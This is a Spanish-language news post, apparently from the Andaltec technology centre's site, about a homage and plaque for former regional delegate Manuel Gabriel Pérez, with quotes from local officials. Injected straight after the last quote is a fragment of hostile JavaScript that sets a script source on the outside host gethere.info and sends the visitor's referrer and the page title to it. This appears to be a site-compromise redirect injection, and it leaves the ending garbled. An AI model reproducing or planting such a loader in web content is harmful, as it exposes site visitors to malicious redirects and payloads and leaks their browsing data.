Andaltec
Copyright Andaltec
La Fundación Andaltec rinde homenaje a Manuel Gabriel Pérez por su apoyo al Centro Tecnológico del Plástico - Andaltec
Andaltec es un centro tecnológico especializado en sistemas de iluminación para automoción, plásticos en contacto con alimentos, prototipado y materiales.
plástico, iluminación, automoción, automóvil, envase, alimentario, ensayo, migración, enac, prototipo, ingeniería, faro, proyector, piloto, material, polímero, pintura, impresión, 3d, simulación, óptica, robot, formación, cad, proyecto, centro, tecnológico, innovación, martos, andalucía, I D I, led
504
post-template-default,single,single-post,postid-504,single-format-standard,bridge-core-1.0,ajax_fade,page_not_loaded,,qode_grid_1300,side_area_uncovered_from_content,footer_responsive_adv,qode-content-sidebar-responsive,qode-theme-ver-10.1,wpb-js-composer js-comp-ver-6.10.0,vc_responsive
 

La Fundación Andaltec rinde homenaje a Manuel Gabriel Pérez por su apoyo al Centro Tecnológico del Plástico

La Fundación Andaltec rinde homenaje a Manuel Gabriel Pérez por su apoyo al Centro Tecnológico del Plástico

Homenaje MG Perez (Andaltec)

El Patronato de la Fundación Andaltec ha rendido hoy un homenaje a Manuel Gabriel Pérez, anterior delegado de Economía, Innovación, Ciencia y Empleo de la Junta de Andalucía en Jaén, por su apoyo al Centro Tecnológico del Plástico andaluz durante los años que estuvo en este cargo. De esta forma, el centro ha colocado una placa en el salón de actos de su sede en Martos, en la que se reconoce la implicación y el constante trabajo realizado por Pérez a favor de Andaltec y del sector del plástico en Andalucía.

El acto de homenaje ha contado con la participación de la delegada de Economía, Innovación, Ciencia y Empleo de la Junta de Andalucía, Ana Cobo; el alcalde de Martos, Francisco Delgado; el presidente de la Fundación Andaltec, Francisco Buenaño, y el propio Manuel Gabriel Pérez.

En su intervención, Pérez se ha mostrado muy agradecido por este homenaje, a la vez que ha destacado el buen funcionamiento del centro y su creciente importancia para el conjunto del sector del plástico en Andalucía. “Es necesario que transmitamos a la sociedad la importancia que tiene Andaltec, ya que es una infraestructura clave para las empresas de Jaén y Andalucía. De hecho, las firmas del sector del plástico técnico se benefician mucho del trabajo del centro, ya que les ayuda a mejorar su competitividad en muchos aspectos”, ha señalado.

Por su parte, Francisco Delgado ha recordado las numerosas visitas que realizó Manuel Gabriel Pérez al centro marteño durante su etapa como delegado y le ha agradecido en nombre del pueblo de Martos “todo lo que ha hecho por Andaltec”. En este sentido, ha recordado que el centro tecnológico ya es una referencia a nivel andaluz y nacional y ha señalado que está creciendo en la actual situación económica, por lo que está convencido de que su futuro es esperanzador. Además, Ana Cobo ha puesto de relieve la capacidad de trabajo de Manuel Gabriel Pérez. “He tenido la suerte de colaborar con él desde hace muchos años y siempre he admirado la implicación y el empeño que pone en todo lo que hace”, ha afirmado. Además, la actual delegada de Economía e Innovación le ha felicitado por haber apostado desde siempre por la innovación como un factor clave para las empresas.

Finalmente, Francisco Buenaño se ha mostrado muy satisfecho por poder rendir este homenaje a Manuel Gabriel Pérez. “A lo largo de todos los años que fue delegado de Innovación, Manuel Gabriel Pérez visitó el centro en numerosas ocasiones, y puedo decir que siempre estuvo a nuestra disposición cuando su presencia era necesaria”, ha declarado.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;